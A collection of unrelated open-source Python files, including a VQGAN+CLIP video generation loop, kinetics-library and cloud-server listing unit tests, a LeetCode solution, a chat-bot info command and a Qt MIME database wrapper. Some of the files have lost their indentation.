#normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
# std=[0.229, 0.224, 0.225])
# CLIP tokenize/encode
if prompts:
for prompt in prompts:
txt, weight, stop = split_prompt(prompt)
embed = perceptor.encode_text(clip.tokenize(txt).to(device)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
for prompt in args.image_prompts:
path, weight, stop = split_prompt(prompt)
img = Image.open(path)
pil_image = img.convert('RGB')
img = resize_image(pil_image, (sideX, sideY))
batch = make_cutouts(TF.to_tensor(img).unsqueeze(0).to(device))
embed = perceptor.encode_image(normalize(batch)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
for seed, weight in zip(args.noise_prompt_seeds, args.noise_prompt_weights):
gen = torch.Generator().manual_seed(seed)
embed = torch.empty([1, perceptor.visual.output_dim]).normal_(generator=gen)
pMs.append(Prompt(embed, weight).to(device))
# Set the optimiser
opt = get_opt(args.optimiser, args.step_size, z)
# Output for the user
print('Using device:', device)
print('Optimising using:', args.optimiser)
if prompts:
print('Using text prompts:', prompts)
if args.image_prompts:
print('Using image prompts:', args.image_prompts)
if args.init_image:
print('Using initial image:', args.init_image)
if args.noise_prompt_weights:
print('Noise prompt weights:', args.noise_prompt_weights)
if args.seed is None:
seed = torch.seed()
else:
seed = args.seed
torch.manual_seed(seed)
print('Using seed:', seed)
i = 0 # Iteration counter
j = 0 # Zoom video frame counter
p = 1 # Phrase counter
smoother = 0 # Smoother counter
this_video_frame = 0 # for video styling
# Messing with learning rate / optimisers
#variable_lr = args.step_size
#optimiser_list = [['Adam',0.075],['AdamW',0.125],['Adagrad',0.2],['Adamax',0.125],['DiffGrad',0.075],['RAdam',0.125],['RMSprop',0.02]]
# Do it
try:
with tqdm() as pbar:
while True:
# Change generated image
if args.make_zoom_video:
if i % args.zoom_frequency == 0:
out = synth(z)
# Save image
img = np.array(out.mul(255).clamp(0, 255)[0].cpu().detach().numpy().astype(np.uint8))[:,:,:]
img = np.transpose(img, (1, 2, 0))
imageio.imwrite('./steps/' + str(j) + '.png', np.array(img))
# Time to start zooming?
if args.zoom_start <= i:
# Convert z back into a Pil image
#pil_image = TF.to_pil_image(out[0].cpu())
# Convert NP to Pil image
pil_image = Image.fromarray(np.array(img).astype('uint8'), 'RGB')
# Zoom
if args.zoom_scale != 1:
pil_image_zoom = zoom_at(pil_image, sideX/2, sideY/2, args.zoom_scale)
else:
pil_image_zoom = pil_image
# Shift - https://pillow.readthedocs.io/en/latest/reference/ImageChops.html
if args.zoom_shift_x or args.zoom_shift_y:
# This one wraps the image
pil_image_zoom = ImageChops.offset(pil_image_zoom, args.zoom_shift_x, args.zoom_shift_y)
# Convert image back to a tensor again
pil_tensor = TF.to_tensor(pil_image_zoom)
# Re-encode
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
z_orig = z.clone()
z.requires_grad_(True)
# Re-create optimiser
opt = get_opt(args.optimiser, args.step_size)
# Next
j += 1
# Change text prompt
if args.prompt_frequency > 0:
if i % args.prompt_frequency == 0 and i > 0:
# In case there aren't enough phrases, just loop
if p >= len(all_phrases):
p = 0
pMs = []
prompts = all_phrases[p]
# Show user we're changing prompt
print(prompts)
for prompt in prompts:
txt, weight, stop = split_prompt(prompt)
embed = perceptor.encode_text(clip.tokenize(txt).to(device)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
'''
# Smooth test
smoother = args.zoom_frequency * 15 # smoothing over x frames
variable_lr = args.step_size * 0.25
opt = get_opt(args.optimiser, variable_lr)
'''
p += 1
'''
if smoother > 0:
if smoother == 1:
opt = get_opt(args.optimiser, args.step_size)
smoother -= 1
'''
'''
# Messing with learning rate / optimisers
if i % 225 == 0 and i > 0:
variable_optimiser_item = random.choice(optimiser_list)
variable_optimiser = variable_optimiser_item[0]
variable_lr = variable_optimiser_item[1]
opt = get_opt(variable_optimiser, variable_lr)
print("New opt: %s, lr= %f" %(variable_optimiser,variable_lr))
'''
# Training time
train(pMs, opt, i, z, model, perceptor, make_cutouts, normalize, z_min, z_max, save_every, args.init_weight, args.make_video, prompts, output_path, gumbel)
# Ready to stop yet?
if i == iterations:
if not args.video_style_dir:
# we're done
break
else:
if this_video_frame == (num_video_frames - 1):
# we're done
make_styled_video = True
break
else:
# Next video frame
this_video_frame += 1
# Reset the iteration count
i = -1
pbar.reset()
# Load the next frame, reset a few options - same filename, different directory
args.init_image = video_frame_list[this_video_frame]
print("Next frame: ", args.init_image)
if args.seed is None:
seed = torch.seed()
else:
seed = args.seed
torch.manual_seed(seed)
print("Seed: ", seed)
filename = os.path.basename(args.init_image)
output_path = os.path.join(cwd, "steps", filename)
# Load and resize image
img = Image.open(args.init_image)
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
# Re-encode
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
z_orig = z.clone()
z.requires_grad_(True)
# Re-create optimiser
opt = get_opt(args.optimiser, args.step_size)
i += 1
pbar.update()
except KeyboardInterrupt:
pass
# All done :)
# Video generation
if args.make_video or args.make_zoom_video:
init_frame = 1 # Initial video frame
if args.make_zoom_video:
last_frame = j
else:
last_frame = i # This will raise an error if that number of frames does not exist.
length = args.video_length # Desired time of the video in seconds
min_fps = 10
max_fps = 60
total_frames = last_frame-init_frame
frames = []
tqdm.write('Generating video...')
for i in range(init_frame,last_frame):
temp = Image.open("./steps/"+ str(i) +'.png')
keep = temp.copy()
frames.append(keep)
temp.close()
if args.output_video_fps > 9:
# Hardware encoding and video frame interpolation
print("Creating interpolated frames...")
ffmpeg_filter = f"minterpolate='mi_mode=mci:me=hexbs:me_mode=bidir:mc_mode=aobmc:vsbmc=1:mb_size=8:search_param=32:fps={args.output_video_fps}'"
output_file = re.compile('\.png$').sub('.mp4', output_path)
try:
p = Popen(['ffmpeg',
'-y',
'-f', 'image2pipe',
'-vcodec', 'png',
'-r', str(args.input_video_fps),
'-i',
'-',
'-b:v', '10M',
'-vcodec', 'h264_nvenc',
'-pix_fmt', 'yuv420p',
'-strict', '-2',
'-filter:v', f'{ffmpeg_filter}',
'-metadata', f'comment={prompts}',
output_file], stdin=PIPE)
except FileNotFoundError:
print("ffmpeg command failed - check your installation")
for im in tqdm(frames):
im.save(p.stdin, 'PNG')
p.stdin.close()
p.wait()
else:
# CPU
fps = np.clip(total_frames/length,min_fps,max_fps)
output_file = re.compile('\.png$').sub('.mp4', output_path)
try:
p = Popen(['ffmpeg',
'-y',
'-f', 'image2pipe',
'-vcodec', 'png',
'-r', str(fps),
'-i',
'-',
'-vcodec', 'libx264',
'-r', str(fps),
'-pix_fmt', 'yuv420p',
'-crf', '17',
'-preset', 'veryslow',
'-metadata', f'comment={prompts}',
output_file], stdin=PIPE)
except FileNotFoundError:
print("ffmpeg command failed - check your installation")
for im in tqdm(frames):
im.save(p.stdin, 'PNG')
p.stdin.close()
p.wait()
|
"""Create a colour variant of the Bootstrap CSS template.

Usage: python <script> NAME

Copies bootstrap_template.css to bootstrap_NAME.css, reads it back,
and rewrites it.  The actual colour substitution is still
unimplemented (see TODO below), so for now the file is written back
unchanged.
"""
import shutil
import sys

template_name = sys.argv[1]
# Bug fix: the original referenced an undefined `name`; the CLI
# argument is bound to `template_name`.
target = 'bootstrap_%s.css' % template_name

# Start from a pristine copy of the template.
shutil.copy('bootstrap_template.css', target)

with open(target, 'r') as f:
    text = f.read()

# Use color scheme from http://kuler.adobe.com/
colors = '5B4634 82634A 9B7759 A88160 E8B285'.split()
# TODO: substitute `colors` into `text` before writing it back;
# the original file marked this step "NOT FINISHED" (and the bare
# marker was a syntax error).

with open(target, 'w') as f:
    f.write(text)
|
#!/usr/bin/env python3
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. William H. Green (whgreen@mit.edu), #
# Prof. Richard H. West (r.west@neu.edu) and the RMG Team (rmg_dev@mit.edu) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
import logging
import os.path
import shutil
import unittest
from rmgpy import settings
from rmgpy.data.kinetics.database import KineticsDatabase
from rmgpy.data.kinetics.family import TemplateReaction
from rmgpy.data.kinetics.library import LibraryReaction
from rmgpy.kinetics import Arrhenius, Troe, PDepArrhenius
from rmgpy.kinetics.model import PDepKineticsModel
###################################################
class TestLibrary(unittest.TestCase):
    """Tests for loading, saving, and post-processing kinetics libraries,
    run against the small testing database shipped with the test data."""
    @classmethod
    def setUpClass(cls):
        """
        A function run ONCE before all unit tests in this class.
        """
        # Set up a dummy database holding only the testing libraries
        cls.database = KineticsDatabase()
        cls.database.load_libraries(
            os.path.join(settings['test_data.directory'], 'testing_database', 'kinetics', 'libraries'),
            libraries=None)  # libraries=None loads all of them: e.g. ['GRI-Mech3.0', 'ethane-oxidation', 'lib_net']
        cls.libraries = cls.database.libraries
    def test_get_library_reactions(self):
        """
        test that get_library_reactions loads reactions correctly
        """
        lib_rxns = self.libraries['GRI-Mech3.0'].get_library_reactions()
        for rxn in lib_rxns:
            self.assertIsInstance(rxn, LibraryReaction)
        lib_rxns = self.libraries['ethane-oxidation'].get_library_reactions()  # should have no direct library reactions
        for rxn in lib_rxns:
            if isinstance(rxn.kinetics, PDepKineticsModel):
                self.assertIsInstance(rxn, LibraryReaction)  # can't load pdep as networks yet, so they load as library reactions
            else:
                self.assertIsInstance(rxn, TemplateReaction)  # all other reactions are template based
    def test_save_library(self):
        """
        This tests the library.save method by writing a new temporary file and
        loading it and comparing the original and copied reactions
        """
        # Work in a throwaway 'eth-oxcopy' directory; the finally block
        # removes it even if an assertion fails.
        os.makedirs(os.path.join(settings['test_data.directory'],
                                 'testing_database', 'kinetics', 'libraries', 'eth-oxcopy'))
        try:
            self.libraries['ethane-oxidation'].save(
                os.path.join(settings['test_data.directory'],
                             'testing_database', 'kinetics', 'libraries', 'eth-oxcopy', 'reactions.py'))
            # Reload everything so the copied library is picked up alongside the originals
            self.database.load_libraries(
                os.path.join(settings['test_data.directory'],
                             'testing_database', 'kinetics', 'libraries'),
                libraries=None)  # this loads all of them: ['GRI-Mech3.0', 'ethane-oxidation', 'eth-oxcopy'])
            ori_rxns = self.database.libraries['ethane-oxidation'].get_library_reactions()
            copy_rxns = self.database.libraries['eth-oxcopy'].get_library_reactions()
            # Any reaction whose repr changed in the round-trip is expected
            # to be a TemplateReaction -- TODO(review) confirm why reprs may differ
            for i in range(len(ori_rxns)):
                if repr(ori_rxns[i]).strip() != repr(copy_rxns[i]).strip():
                    self.assertIsInstance(copy_rxns[i], TemplateReaction)
        finally:
            shutil.rmtree(os.path.join(settings['test_data.directory'],
                                       'testing_database', 'kinetics', 'libraries', 'eth-oxcopy'))
    def test_generate_high_p_limit_kinetics(self):
        """
        Test that a :class:Arrhenius kinetics object representing the high pressure limit rate
        is returned from Troe/Lindmann/PDepArrhenius/Chebyshev kinetic classes
        """
        lib_rxns = self.libraries['lib_net'].get_library_reactions()
        for rxn in lib_rxns:
            # network_kinetics starts unset; generate_high_p_limit_kinetics()
            # populates it only when a high-P limit can be derived
            self.assertIsNone(rxn.network_kinetics)
            logging.debug("Processing reaction {0}".format(rxn))
            success = rxn.generate_high_p_limit_kinetics()
            if (isinstance(rxn.kinetics, PDepArrhenius) and rxn.kinetics.pressures.value_si[-1] < 9000000) \
                    or not rxn.is_unimolecular():
                # generate_high_p_limit_kinetics() should return `False` if the reaction is not unimolecular
                # or if it is a PDepArrhenius or Chebyshev with Pmax < 90 bar (9e6 Pa)
                self.assertFalse(success)
            else:
                self.assertTrue(success)
                if isinstance(rxn.kinetics, Arrhenius):
                    # If the library reaction is already an Arrhenius expression, network_kinetics isn't generated
                    self.assertIsNone(rxn.network_kinetics)
                else:
                    self.assertTrue(isinstance(rxn.network_kinetics, Arrhenius))
                if isinstance(rxn.kinetics, Troe):
                    # This block quantitatively tests the "H + CH2 <=> CH3" reaction
                    # from the test library test_data/testing_database/kinetics/libraries/lib_net/reactions.py
                    # 1. Check that the T exponent in the modified Arrhenius (the "n") equals to 0
                    self.assertAlmostEqual(rxn.network_kinetics.n.value_si, 0)
                    # 2. Check that the pre-exponential factor equals to 6e+8 m^3/(mol*s)
                    self.assertAlmostEqual(int(rxn.network_kinetics.A.value_si), 6e+8)
|
# -*- coding: utf-8 -*-
# @Author: LC
# @Date: 2016-03-10 17:38:42
# @Last modified by: LC
# @Last Modified time: 2016-04-10 16:24:30
# @Email: liangchaowu5@gmail.com
class Solution(object):
    def threeSumClosest(self, nums, target):
        """
        Return the sum of the three numbers in ``nums`` whose sum is
        closest to ``target``.

        Uses the classic sort + two-pointer sweep: O(n^2) time,
        O(1) extra space (sorts ``nums`` in place, as the original did).

        Fixes over the original:
          - inputs with fewer than 3 elements returned an undefined
            variable (NameError); now they return 0 like the empty case
          - ``min``/``sum`` no longer shadow builtins
          - removed an unreachable duplicate ``return``
          - the best sum is tracked unconditionally, so it cannot be
            stale when every gap exceeds the old 1000000 sentinel

        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        if len(nums) < 3:
            # No triplet exists; preserve the original's 0 for empty input.
            return 0
        nums.sort()
        best = None  # closest triplet sum seen so far
        for i in range(len(nums) - 2):
            lo, hi = i + 1, len(nums) - 1
            while lo < hi:
                total = nums[i] + nums[lo] + nums[hi]
                if best is None or abs(total - target) < abs(best - target):
                    best = total
                if total > target:
                    hi -= 1       # shrink the sum
                elif total < target:
                    lo += 1       # grow the sum
                else:
                    return total  # exact match cannot be beaten
        return best
|
import os # os.uname, os.getpid
import time # time.time
import datetime # datetime.timedelta
from ..handlers import CommandHandler
from ..dataclasses import Message
from .. import __version__
from .._i18n import _
# Example of a more sophisticated command
class InfoCommand(CommandHandler):
    """
    Bot information command

    This handler creates a command responding with information
    about the bot. The command is by default called 'info',
    but this can be changed with the `command` kwarg.

    Sent information can be customized by the `options` kwarg.
    Available options:
    name stibium prefix user hostname pid uptime owner
    """
    # Class-level defaults: which pieces of information are included in
    # the response.  __init__ copies this dict per instance, so one
    # instance's overrides never leak into other InfoCommand instances.
    options = {
        'name': True,
        'stibium': True,
        'prefix': True,
        'user': True,
        'hostname': False,
        'pid': False,
        'uptime': True,
        'owner': True,
    }
    # Unix timestamp recorded in setup(); used to compute uptime.
    starttime = None
    def __init__(self, command='info', options=None):
        """
        :param command: name of the command (default 'info')
        :param options: optional dict of {option name: bool} overriding
            the defaults above; unknown keys are silently ignored
        """
        super().__init__(handler=None, command=command)
        # Bug fix: copy the shared class-level dict before applying
        # overrides.  The original mutated InfoCommand.options directly,
        # so configuring one instance changed every other instance.
        self.options = dict(type(self).options)
        if options is not None:
            for k, v in options.items():
                if k in self.options:
                    self.options[k] = v
    def setup(self, bot):
        """Record the start time so the 'uptime' option can be computed."""
        super().setup(bot)
        self.starttime = time.time()
    def _get_data(self, x, bot):
        """Return the response line for option *x* (None if unknown)."""
        if x == 'name':
            return bot.name
        if x == 'stibium':
            return _('running Stibium v{version}').format(version=__version__)
        if x == 'prefix':
            return _('Prefix: {prefix}').format(prefix=repr(bot.prefix))
        if x == 'user':
            uid = bot.fbchat_client.uid
            username = bot.get_user_name(uid)
            return _('Logged in as {username} ({uid})').format(username=username, uid=uid)
        if x == 'hostname':
            return _('Server: {hostname}').format(hostname=os.uname()[1])
        if x == 'pid':
            return _('PID: {pid}').format(pid=os.getpid())
        if x == 'uptime':
            return _('Uptime: {uptime}').format(
                uptime=datetime.timedelta(seconds=int(time.time()-self.starttime))
            )
        if x == 'owner':
            if bot.owner is None:
                return _('Owner not set!')
            return _('Owner: {username} ({uid})').format(
                uid=bot.owner.id_,
                username=bot.get_user_name(bot.owner.id_)
            )
    def handlerfn(self, message: Message, bot):
        """Reply to *message* with one line per enabled option."""
        response = []
        for k, v in self.options.items():
            if v:
                response.append(self._get_data(k, bot))
        message.reply('\n'.join(response))
|
from Resources.resource_classes import ResourceClass
from Resources.resource_depart import ResourceDepart
from Resources.resource_students import ResourceStudent
class ResourceIn():
    """Unified entry point aggregating the individual resource accessors."""

    def get_depart(self):
        """Entry point for department (college) resources."""
        return ResourceDepart()

    def get_class(self):
        """Entry point for class resources."""
        return ResourceClass()

    def get_student(self):
        """Entry point for student resources."""
        return ResourceStudent()
|
from __future__ import annotations
import os
from typing import Literal
from prettyqt import core
from prettyqt.utils import bidict, datatypes
# String aliases accepted wherever a QMimeDatabase.MatchMode is expected.
MatchModeStr = Literal["default", "extension", "content"]
# Two-way mapping between the string aliases above and the Qt enum values.
MATCH_MODE: bidict[MatchModeStr, core.QMimeDatabase.MatchMode] = bidict(
    default=core.QMimeDatabase.MatchMode.MatchDefault,
    extension=core.QMimeDatabase.MatchMode.MatchExtension,
    content=core.QMimeDatabase.MatchMode.MatchContent,
)
class MimeDatabase(core.QMimeDatabase):
    """Maintains a database of MIME types."""
    def get_mime_type_for_file(
        self,
        path: datatypes.PathType | core.QFileInfo,
        match_mode: MatchModeStr | core.QMimeDatabase.MatchMode = "default",
    ) -> core.MimeType:
        """Return the MIME type of the file at *path* as a core.MimeType.

        *match_mode* selects the Qt matching strategy and may be given
        either as a string key from MATCH_MODE or as the Qt enum value.
        """
        if isinstance(path, os.PathLike):
            path = os.fspath(path)
        mime_type = self.mimeTypeForFile(path, MATCH_MODE.get_enum_value(match_mode))
        return core.MimeType(mime_type)
    def get_mime_type_for_data(
        self, data: datatypes.ByteArrayType | core.QIODevice
    ) -> core.MimeType:
        """Return the MIME type determined from the content of *data*."""
        return core.MimeType(self.mimeTypeForData(data))
    def get_mime_type_for_filename_and_data(
        self, filename: os.PathLike, data: datatypes.ByteArrayType | core.QIODevice
    ) -> core.MimeType:
        """Return the MIME type determined from *filename* and *data* together."""
        path = os.fspath(filename)
        return core.MimeType(self.mimeTypeForFileNameAndData(path, data))
    def get_mime_type_for_name(self, name: str) -> core.MimeType:
        """Return the MIME type registered under *name*."""
        return core.MimeType(self.mimeTypeForName(name))
    def get_mime_type_for_url(self, url: core.QUrl | str) -> core.MimeType:
        """Return the MIME type for *url* (plain strings are wrapped in QUrl first)."""
        url = core.QUrl(url) if isinstance(url, str) else url
        return core.MimeType(self.mimeTypeForUrl(url))
    def get_mime_types_for_filename(
        self, filename: datatypes.PathType
    ) -> list[core.MimeType]:
        """Return all MIME types that plausibly match *filename*."""
        path = os.fspath(filename)
        return [core.MimeType(i) for i in self.mimeTypesForFileName(path)]
if __name__ == "__main__":
    # Quick manual smoke test: resolve the MIME type of a sample path.
    print(MimeDatabase().get_mime_type_for_file("C:/test.log"))
|
"""
Copyright 2016 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cloudcafe.compute.common.exceptions as exceptions
from cafe.drivers.unittest.decorators import tags
from cloudcafe.common.tools.datagen import rand_name
from cloudcafe.compute.common.types import NovaImageStatusTypes
from cloudcafe.compute.common.types import NovaServerStatusTypes
from cloudroast.compute.fixtures import ComputeFixture
class ServerListTest(ComputeFixture):
    @classmethod
    def setUpClass(cls):
        """
        Perform actions that setup the necessary resources for testing.

        The following resources are created during the setup
            - Networking, default network from ComputeFixture
            - 2 servers with the same configuration (waits for active)
            - Image creation from the second server (waits for active)
            - 3rd server from the image created in the step above, using
              the alternate flavor (waits for active)
        """
        super(ServerListTest, cls).setUpClass()
        networks = None
        if cls.servers_config.default_network:
            networks = [{'uuid': cls.servers_config.default_network}]
        # NOTE: cls.name is reassigned for each server, so after setup it
        # holds the *third* server's name.
        cls.name = rand_name("server")
        first_response = cls.servers_client.create_server(
            name=cls.name, image_ref=cls.image_ref,
            flavor_ref=cls.flavor_ref, networks=networks).entity
        cls.resources.add(first_response.id,
                          cls.servers_client.delete_server)
        cls.name = rand_name("server")
        second_response = cls.servers_client.create_server(
            name=cls.name, image_ref=cls.image_ref,
            flavor_ref=cls.flavor_ref, networks=networks).entity
        cls.resources.add(second_response.id,
                          cls.servers_client.delete_server)
        # Both create requests were issued before either wait, so the two
        # servers can build concurrently.
        cls.server = cls.server_behaviors.wait_for_server_status(
            first_response.id, NovaServerStatusTypes.ACTIVE).entity
        cls.second_server = cls.server_behaviors.wait_for_server_status(
            second_response.id, NovaServerStatusTypes.ACTIVE).entity
        # Create a unique image by snapshotting the second server
        other_image_name = rand_name('image')
        resp = cls.servers_client.create_image(
            cls.second_server.id, other_image_name)
        assert resp.status_code == 202
        cls.other_image_id = cls.parse_image_id(resp)
        cls.resources.add(cls.other_image_id, cls.images_client.delete_image)
        cls.image_behaviors.wait_for_image_status(
            cls.other_image_id, NovaImageStatusTypes.ACTIVE)
        cls.name = rand_name("server")
        # Third server: built from the new image and the alternate flavor,
        # so the image/flavor list filters can tell it apart from the others.
        third_response = cls.servers_client.create_server(
            name=cls.name, image_ref=cls.other_image_id,
            flavor_ref=cls.flavor_ref_alt, networks=networks).entity
        cls.resources.add(third_response.id,
                          cls.servers_client.delete_server)
        cls.third_server = cls.server_behaviors.wait_for_server_status(
            third_response.id, NovaServerStatusTypes.ACTIVE).entity
@tags(type='smoke', net='no')
def test_get_server(self):
"""
Return the full details of a single server.
It will take the first server created in setup and pulls the server
details back; nothing is modified during this test.
The following assertions occur:
- 200 status code from http call.
- Server name matches config.
- Image id matches config.
- Flavor id matches config.
"""
server_info_response = self.servers_client.get_server(self.server.id)
server_info = server_info_response.entity
self.assertEqual(200, server_info_response.status_code)
self.assertEqual(self.server.name, server_info.name,
msg="Server name did not match")
self.assertEqual(self.image_ref, server_info.image.id,
msg="Image id did not match")
self.assertEqual(self.flavor_ref, server_info.flavor.id,
msg="Flavor id did not match")
@tags(type='smoke', net='no')
def test_list_servers(self):
"""
All 3 servers created in setup should be returned.
The following assertions occur:
- 200 status code from http call.
- Server 1,2 and 3 are in the list returned in the response.
"""
list_servers_response = self.servers_client.list_servers()
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertIn(self.second_server.min_details(), servers_list)
self.assertIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_all_tenants(self):
"""
Verify that all tenants cannot be retrieved using a non-admin account.
This will call the list_servers passing an integer value of 1 to the
all_tenants parameter. This should return a 403 response code.
The following assertions occur:
- The response code returned is not a 403
"""
all_tenants = 1
params = all_tenants
with self.assertRaises(exceptions.Forbidden):
self.servers_client.list_servers(all_tenants=params)
@tags(type='smoke', net='no')
def test_list_servers_with_detail(self):
"""
Details list of servers and verify they are in the list returned.
After the list_servers_with_details is called, it grabs the entity,
then iterates through the details and puts all the server ids into an
array which then will look for the server ids in the list.
The following assertions occur:
- 200 status code from the http call.
- Server 1 id is contained in the list.
- Server 2 id is contained in the list.
- Server 3 id is contained in the list.
"""
list_response = self.servers_client.list_servers_with_detail()
list_servers_detail = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in list_servers_detail:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_server_details_using_marker(self):
"""
The list of servers should start from the provided marker (server id).
This gets all servers current in then compute instance with the call
list_serveris_with_details. Grabs the first item in the list, takes
the id and then calls the same list server with details with
parameters being the id of the first server it just returned to
ensure that the same server is not returned.
The following assertions occur:
- 200 status code from the http call.
- The first server returned is not in the new list of entities.
"""
list_response = self.servers_client.list_servers_with_detail()
list_server_detail = list_response.entity
first_server = list_server_detail[0]
# Verify the servers doesn't contain the server used as a marker
params = first_server.id
filtered_servers = self.servers_client.list_servers_with_detail(
marker=params)
self.assertEqual(200, filtered_servers.status_code)
self.assertNotIn(first_server, filtered_servers.entity)
@tags(type='positive', net='no')
def test_list_servers_using_marker(self):
"""
The list of servers should start from the provided marker (server id).
This gets all servers current in then compute instance with the call
list_servers. Grabs the first item in the list, takes the id and then
calls the same list server with details with parameters being the id
of the first server it just returned to ensure that the same server
is not returned.
The following assertions occur:
- 200 status code from the http call.
- The first server returned is not in the new list of entities.
"""
list_server_info_response = self.servers_client.list_servers()
list_server_info = list_server_info_response.entity
first_server = list_server_info[0]
# Verify the servers doesn't contain the server used as a marker
params = first_server.id
filtered_servers = self.servers_client.list_servers(
marker=params)
self.assertEqual(200, filtered_servers.status_code)
self.assertNotIn(first_server, filtered_servers.entity)
@tags(type='positive', net='no')
def test_list_server_with_detail_limit_results(self):
"""
Verify the expected number of servers (1) are returned.
This will call the list_servers_with_detail with a parameter of an
1 (integer) being passed into the limit param. This should return
only 1 entry in the list.
The following assertions occur:
- The len of the list returned is equal to the limit (1).
"""
limit = 1
params = limit
response = self.servers_client.list_servers_with_detail(limit=params)
servers = response.entity
self.assertEqual(
limit, len(response.entity),
msg="({0}) servers returned. Expected {1} servers.".format(
len(servers), limit))
@tags(type='positive', net='no')
def test_list_servers_with_detail_all_tenants(self):
"""
Verify that all tenants cannot be retrieved using a non-admin account.
This will call the list_servers_with_detail passing an integer value of
1 to the all_tenants parameter. This should return a 403 response code.
The following assertions occur:
- The response code returned is not a 403
"""
all_tenants = 1
params = all_tenants
with self.assertRaises(exceptions.Forbidden):
self.servers_client.list_servers_with_detail(all_tenants=params)
@tags(type='positive', net='no')
def test_list_servers_filter_by_image(self):
"""
Filter the list of servers by image that created the first 2 servers.
This will call the list_servers with the image which is the primary
image in the setup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are in the list.
- Server 3 is NOT in the list.
"""
params = self.image_ref
list_servers_response = self.servers_client.list_servers(image=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertIn(self.second_server.min_details(), servers_list)
self.assertNotIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_flavor(self):
"""
Filter the list of servers by flavor that created the 3rd server.
This will call the list_servers with the alternate flavor that created
the third server.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are not in the list.
- Server 3 is in the list.
"""
params = self.flavor_ref_alt
list_servers_response = self.servers_client.list_servers(flavor=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertNotIn(self.server.min_details(), servers_list)
self.assertNotIn(self.second_server.min_details(), servers_list)
self.assertIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_server_name(self):
"""
Filter the list of servers by name, using server 1's name.
This will call the list_servers with the server name that was created
at startup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 is in the list.
- Server 2 and 3 are not in the list.
"""
params = self.server.name
list_servers_response = self.servers_client.list_servers(name=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertNotIn(self.second_server.min_details(), servers_list)
self.assertNotIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_server_status(self):
"""
Filter the list of servers by server status of active.
This will call the list_servers with the status of active expecting
all servers to be returned.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3 are in the list.
"""
params = 'active'
list_servers_response = self.servers_client.list_servers(status=params)
list_servers = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), list_servers)
self.assertIn(self.second_server.min_details(), list_servers)
self.assertIn(self.third_server.min_details(), list_servers)
@tags(type='positive', net='no')
def test_list_servers_filter_by_changes_since(self):
"""
Filter the list of servers by changes-since.
This will call the list_servers with the expectation of all servers
being returned in the list. The list will be of all servers but will
go through then entries and pull the id into a list to compare against.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3's ids are in the generated list.
"""
params = self.server.created
servers = self.servers_client.list_servers(changes_since=params)
self.assertEqual(200, servers.status_code)
servers_ids_list = []
for i in servers.entity:
servers_ids_list.append(i.id)
self.assertIn(self.server.id, servers_ids_list)
self.assertIn(self.second_server.id, servers_ids_list)
self.assertIn(self.third_server.id, servers_ids_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_image(self):
"""
Filter the list of servers with details by image.
This will call the list_servers_with_detail with the image which is
the primary image in the setup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are in the list.
- Server 3 is NOT in the list.
"""
params = self.image_ref
list_response = self.servers_client.list_servers_with_detail(
image=params)
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in list_response.entity:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
